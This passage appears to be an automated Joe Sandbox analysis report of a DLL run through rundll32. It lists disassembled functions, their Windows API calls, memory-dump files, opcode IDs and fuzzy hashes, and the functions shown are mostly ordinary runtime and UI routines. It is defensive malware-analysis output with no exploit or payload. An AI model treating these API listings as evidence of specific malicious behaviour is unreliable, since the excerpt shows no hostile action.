                    • GetModuleFileNameW.KERNEL32(6C7C0000,?,00000105,6C7C0000,6CD4EC54,6C7CEAF4,6C7E1FBC,?,6C7D1805,00010000,00001000,00001000), ref: 6C7CEAA6
                      • Part of subcall function 6C7CFD48: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,6C7CFE04,?,6C7C0000,6CD4EC54,?,6C7CEAB4,6C7C0000,?,00000105,6C7C0000,6CD4EC54,6C7CEAF4), ref: 6C7CFD84
                      • Part of subcall function 6C7CFD48: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,6C7CFE04,?,6C7C0000,6CD4EC54,?,6C7CEAB4,6C7C0000,?,00000105), ref: 6C7CFDD5
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: FileModuleName$LibraryLoad
                    • String ID:
                    • API String ID: 4113206344-0
                    • Opcode ID: 09ddc468e918232d92f24f1bf2a82953b666190d4328936f184ce67041bedd1f
                    • Instruction ID: 5e96dbd8bbb88b6c9316198b4670771f027e654be659180fc2930042bc8344f9
                    • Opcode Fuzzy Hash: 09ddc468e918232d92f24f1bf2a82953b666190d4328936f184ce67041bedd1f
                    • Instruction Fuzzy Hash: 83E0ED71A003159FCB00DE58D9C5E8A77E8BF09758F084AA1AD54CF346D3B1D9548BE2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9269F0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                    Download Yara Rule
                    APIs
                    • KiUserCallbackDispatcher.NTDLL(FFFFFFFF,?,00000000,00000001,6C9BA578,6C956562,00000004,?,00000004,0000000E,?,00000008,00000032,?,00000004,0000000A), ref: 6C926A06
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: CallbackDispatcherUser
                    • String ID:
                    • API String ID: 2492992576-0
                    • Opcode ID: 96e6bcaa24265af6096c4e5740bb5f2ae50045863caa0d168ac6dc72f251774f
                    • Instruction ID: 8ad95a784cc32168d58c18240c8837ed13770cf5a2dc2492415da4f1fb21a06f
                    • Opcode Fuzzy Hash: 96e6bcaa24265af6096c4e5740bb5f2ae50045863caa0d168ac6dc72f251774f
                    • Instruction Fuzzy Hash: 26E09A712042504FDB89CE9CC4C5B857BD9AF49214F1480A5ED49CF25BD764EC49CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9269BC Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • KiUserCallbackDispatcher.NTDLL(FFFFFFFF,?,00000000,00000001,6C9BA539,6C95653A,00000004,?,00000004,0000000E,?,00000008,00000032,?,00000004,0000000A), ref: 6C9269CF
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: CallbackDispatcherUser
                    • String ID:
                    • API String ID: 2492992576-0
                    • Opcode ID: b31d43b1bc9ec0ae4b44489650baab33aee2111c5e29f5e1dceccd02d2d1b36e
                    • Instruction ID: ef17767df24517710729df173c26627ffd466925635d43336f225be0023f85d6
                    • Opcode Fuzzy Hash: b31d43b1bc9ec0ae4b44489650baab33aee2111c5e29f5e1dceccd02d2d1b36e
                    • Instruction Fuzzy Hash: F6E092712052408FDB84CEACC5C5B853BE8AF09214F1440A5ED89CB24BC764E848CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C893B60 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,6C955844,6C955844,6C955844,?,6C92ACEF,6C92D584,6C955844,6C955844,6C955844,04A8D080,?,6C9B1D27), ref: 6C893B7E
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: fbc5aca6889f7a66a8bd32f0640c28e9ac7e45ef7dd1efd7cfc32bb571d95ac5
                    • Instruction ID: 1fefe72410493511e106ad50b5d42b15eff2c02540ca3f83645f6147a9c3fa6e
                    • Opcode Fuzzy Hash: fbc5aca6889f7a66a8bd32f0640c28e9ac7e45ef7dd1efd7cfc32bb571d95ac5
                    • Instruction Fuzzy Hash: 48114C74200305AFD720CF19C881B82F7E4EB89350F14893AE9A9CBB44D370E914CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C58E8 Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,6C7C5EFF,?,6C7CF9D1,6C7E1FB8,?,?,6C7CF968,00000000,6C7CF98D), ref: 6C7C58FF
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 5fe93a366dac0596eee60c241d5f610087722d6935bb135298c954b2dda76a09
                    • Instruction ID: 4794626067cc3563887c76531e53d3a075ca025a932c8d9a31275ab1644736e6
                    • Opcode Fuzzy Hash: 5fe93a366dac0596eee60c241d5f610087722d6935bb135298c954b2dda76a09
                    • Instruction Fuzzy Hash: 58F0AFF6B013025FFB548F789A857827BE9A709354F51427EEA09DBBC4E7B088008780
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 6C7CF414 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 151stringlibraryfileCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,6C7E1FB8,?,?,?,6C7CF75F,00000000,6C7CF818,?,80000001,Software\Embarcadero\Locales,00000000,00020019,?,00000000,6C7CF83C), ref: 6C7CF431
                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 6C7CF442
                    • FindFirstFileW.KERNEL32(?,?,kernel32.dll,6C7E1FB8,?,?,?,6C7CF75F,00000000,6C7CF818,?,80000001,Software\Embarcadero\Locales,00000000,00020019,?), ref: 6C7CF550
                    • FindClose.KERNEL32(?,?,?,kernel32.dll,6C7E1FB8,?,?,?,6C7CF75F,00000000,6C7CF818,?,80000001,Software\Embarcadero\Locales,00000000,00020019), ref: 6C7CF562
                    • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,6C7E1FB8,?,?,?,6C7CF75F,00000000,6C7CF818,?,80000001,Software\Embarcadero\Locales,00000000), ref: 6C7CF56E
                    • lstrlenW.KERNEL32(?), ref: 6C7CF5B3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                    • String ID: GetLongPathNameW$\$kernel32.dll
                    • API String ID: 1930782624-3908791685
                    • Opcode ID: b62988c3b6ac7bb229e74d385e45e0b7e833276b740a8df651c4a6f4e7119164
                    • Instruction ID: 8daeb7a67e0ff8eae295a60c52032214b001bac779d1d02bb226275fd18c8d5d
                    • Opcode Fuzzy Hash: b62988c3b6ac7bb229e74d385e45e0b7e833276b740a8df651c4a6f4e7119164
                    • Instruction Fuzzy Hash: 68518F31B0060A9FCB00DFA8DA88BDEB3B9AF44314F1485A59614D7750EB78EE458B46
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9097EC Relevance: 86.0, APIs: 1, Strings: 48, Instructions: 278libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryW.KERNEL32(uxtheme.dll,00000000,6C909BB2,?,?,?,6C97D831,?,00000000,?,?,6C982C55,6C9833FE,6C97C8A8,00000000,6C97C955), ref: 6C909833
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundExtent$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                    • API String ID: 1029625771-1748089680
                    • Opcode ID: 9d40232eb234fd84e5a88e4fae7e98588a24d9ae05870883b115f9d2f78a9318
                    • Instruction ID: db1be3e871683824f60a28e5926a893ba15ff0c8e951e95803dacd8e42c554bb
                    • Opcode Fuzzy Hash: 9d40232eb234fd84e5a88e4fae7e98588a24d9ae05870883b115f9d2f78a9318
                    • Instruction Fuzzy Hash: B4A134B1A44690AFEF00DBA5CDC8A6537BCFB46204B024DA9B945CFA0CDB35E805CB71
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9B4ED0 Relevance: 15.1, APIs: 10, Instructions: 133windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 6C9B4F41
                    • GetWindowLongW.USER32(00000000,000000EC), ref: 6C9B4F53
                    • GetClassLongW.USER32(00000000,000000E6), ref: 6C9B4F66
                    • SetWindowLongW.USER32(00000000,000000F0), ref: 6C9B4FA6
                    • SetWindowLongW.USER32(00000000,000000EC,?), ref: 6C9B4FBA
                    • SetClassLongW.USER32(00000000,000000E6,?), ref: 6C9B4FCE
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 6C9B5008
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 6C9B5020
                    • GetSystemMenu.USER32(00000000,000000FF,00000000,000000EC,?,?,00000000,000000EC,00000000,000000F0), ref: 6C9B502F
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037,00000000,000000EC,?,?,00000000,000000EC,00000000,000000F0), ref: 6C9B5058
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Long$Window$ClassMessageSend$MenuSystem
                    • String ID:
                    • API String ID: 494549727-0
                    • Opcode ID: 3464ee3d35c08521429e16173e5504a6da60f61f94ab4f81b82318c744f5b450
                    • Instruction ID: e4269df3c779415949ce9442d3813ab32f56a17742a4d1b6f2f01740135ce1cf
                    • Opcode Fuzzy Hash: 3464ee3d35c08521429e16173e5504a6da60f61f94ab4f81b82318c744f5b450
                    • Instruction Fuzzy Hash: E141C56030539076DB009A788D88BEB37594F5274CF145A39B499EBBD6CB79D80CC791
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C97C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 64libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 6C7C97D5
                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 6C7C97DB
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 6C7C97EE
                    • GetLastError.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 6C7C97FB
                    • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,6C7C9874,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 6C7C9826
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                    • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                    • API String ID: 1184211438-79381301
                    • Opcode ID: bdd3833a443ec255e1b19aee5dfaa92f884c0f1df5fe0432009e21cb5d11c73d
                    • Instruction ID: bc65ca7ea2a9b6aed2655686fa01bb374471db2a8071c50e5a91fb9ae1c15400
                    • Opcode Fuzzy Hash: bdd3833a443ec255e1b19aee5dfaa92f884c0f1df5fe0432009e21cb5d11c73d
                    • Instruction Fuzzy Hash: E2118470F0420AEEDB80DBA6DA98A9DB7F9EF5431CF1085A5E414E7A40D735C684CB13
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C8F9D00 Relevance: 12.3, APIs: 8, Instructions: 267windowCOMMON
                    Download Yara Rule
                    APIs
                    • CreateIconIndirect.USER32(FFFFFFFF), ref: 6C8F9F03
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
